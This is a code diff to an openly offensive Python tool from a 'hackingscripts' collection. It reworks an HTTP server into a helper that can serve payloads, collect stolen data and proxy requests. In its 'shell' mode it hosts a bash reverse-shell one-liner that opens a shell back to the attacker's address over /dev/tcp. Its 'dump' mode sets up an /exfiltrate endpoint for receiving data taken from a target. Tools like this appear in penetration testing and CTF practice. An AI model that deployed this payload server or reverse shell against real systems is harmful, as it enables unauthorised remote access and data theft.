|
@@ -3,6 +3,7 @@
|
|
|
from hackingscripts import util
|
|
|
from http.server import BaseHTTPRequestHandler, HTTPServer
|
|
|
import threading
|
|
|
+import requests
|
|
|
import sys
|
|
|
import os
|
|
|
import ssl
|
|
@@ -15,13 +16,26 @@ class FileServerRequestHandler(BaseHTTPRequestHandler):
|
|
|
def do_POST(self):
|
|
|
self.do_GET()
|
|
|
|
|
|
+ def onForward(self, target):
|
|
|
+ queryStr = "" if "?" not in self.path else self.path[self.path.index("?")+1:]
|
|
|
+ if queryStr:
|
|
|
+ target += "?" if "?" not in target else "&"
|
|
|
+ target += queryStr
|
|
|
+
|
|
|
+ method = self.command
|
|
|
+ res = requests.request(method, target)
|
|
|
+ return res.content, res.status_code
|
|
|
+
|
|
|
def do_GET(self):
|
|
|
- path = self.path if "?" not in self.path else self.path[0:self.path.find("?")]
|
|
|
- if path in self.server.files:
|
|
|
- data = self.server.files[path]
|
|
|
- self.send_response(200)
|
|
|
+
|
|
|
+ path = self.server.cleanPath(self.path)
|
|
|
+ if path in self.server.routes:
|
|
|
+ data, code = self.server.routes[path](self)
|
|
|
+ self.send_response(code)
|
|
|
self.end_headers()
|
|
|
- self.wfile.write(data)
|
|
|
+
|
|
|
+ if data:
|
|
|
+ self.wfile.write(data)
|
|
|
else:
|
|
|
self.send_response(404)
|
|
|
self.end_headers()
|
|
@@ -42,34 +56,40 @@ class FileServerRequestHandler(BaseHTTPRequestHandler):
|
|
|
|
|
|
def log_message(self, format, *args):
|
|
|
if self.server.logRequests:
|
|
|
- # BaseHTTPRequestHandler.log_message(format, *args)
|
|
|
super().log_message(format, *args)
|
|
|
|
|
|
class HttpFileServer(HTTPServer):
|
|
|
def __init__(self, addr, port):
|
|
|
super().__init__((addr, port), FileServerRequestHandler)
|
|
|
self.logRequests = False
|
|
|
+ self.routes = { }
|
|
|
self.dumpRequests = []
|
|
|
- self.files = { }
|
|
|
|
|
|
- def addFile(self, name, data):
|
|
|
- if isinstance(data, str):
|
|
|
- data = data.encode("UTF-8")
|
|
|
- if not name.startswith("/"):
|
|
|
- name = "/" + name
|
|
|
- self.files[name.strip()] = data
|
|
|
+ def cleanPath(self, path):
|
|
|
+
|
|
|
+ if "?" in path:
|
|
|
+ path = path[0:path.find("?")]
|
|
|
+
|
|
|
+ if not path.startswith("/"):
|
|
|
+ path = "/" + path
|
|
|
+
|
|
|
+ return path.strip()
|
|
|
|
|
|
def addFile(self, name, data):
|
|
|
if isinstance(data, str):
|
|
|
data = data.encode("UTF-8")
|
|
|
- if not name.startswith("/"):
|
|
|
- name = "/" + name
|
|
|
- self.files[name.strip()] = data
|
|
|
+
|
|
|
+ # return 200 - OK and data
|
|
|
+ self.addRoute(name, lambda req: (data, 200))
|
|
|
|
|
|
def dumpRequest(self, name):
|
|
|
- if not name.startswith("/"):
|
|
|
- name = "/" + name
|
|
|
- self.dumpRequests.append(name)
|
|
|
+ self.dumpRequests.append(self.cleanPath(name))
|
|
|
+
|
|
|
+ def addRoute(self, path, func):
|
|
|
+ self.routes[self.cleanPath(path)] = func
|
|
|
+
|
|
|
+ def forwardRequest(self, path, target):
|
|
|
+ self.addRoute(path, lambda req: req.onForward(target))
|
|
|
|
|
|
def enableLogging(self):
|
|
|
self.logRequests = True
|
|
@@ -99,13 +119,27 @@ class HttpFileServer(HTTPServer):
|
|
|
t.start()
|
|
|
return t
|
|
|
|
|
|
-# EXAMPLE
|
|
|
+ def start(self):
|
|
|
+ return self.serve_forever()
|
|
|
+
|
|
|
if __name__ == "__main__":
|
|
|
- listenPort = 4444 if len(sys.argv) < 2 else int(sys.argv[1])
|
|
|
- ipAddress = util.getAddress()
|
|
|
+ if len(sys.argv) < 2 or sys.argv[1] not in ["shell","dump","proxy"]:
|
|
|
+ print("Usage: %s [shell,dump,proxy]" % sys.argv[0])
|
|
|
+ exit(1)
|
|
|
|
|
|
- rev_shell = "bash -i >& /dev/tcp/%s/%d 0>&1" % (ipAddress, listenPort)
|
|
|
fileServer = HttpFileServer("0.0.0.0", 80)
|
|
|
- fileServer.addFile("shell.sh", rev_shell)
|
|
|
- fileServer.startBackground()
|
|
|
- print("Reverse Shell URL: http://%s/shell.sh" % ipAddress)
|
|
|
+ ipAddress = util.getAddress()
|
|
|
+
|
|
|
+ if sys.argv[1] == "shell":
|
|
|
+ listenPort = 4444 if len(sys.argv) < 3 else int(sys.argv[2])
|
|
|
+ rev_shell = "bash -i >& /dev/tcp/%s/%d 0>&1" % (ipAddress, listenPort)
|
|
|
+ fileServer.addFile("shell.sh", rev_shell)
|
|
|
+ print("Reverse Shell URL: http://%s/shell.sh" % ipAddress)
|
|
|
+ elif sys.argv[1] == "dump":
|
|
|
+ fileServer.dumpRequest("/exfiltrate")
|
|
|
+ print("Exfiltrate data using: http://%s/exfiltrate" % ipAddress)
|
|
|
+ elif sys.argv[1] == "proxy":
|
|
|
+ fileServer.forwardRequest("/proxy", "https://google.com")
|
|
|
+ print("Exfiltrate data using: http://%s/proxy" % ipAddress)
|
|
|
+
|
|
|
+ fileServer.start()
|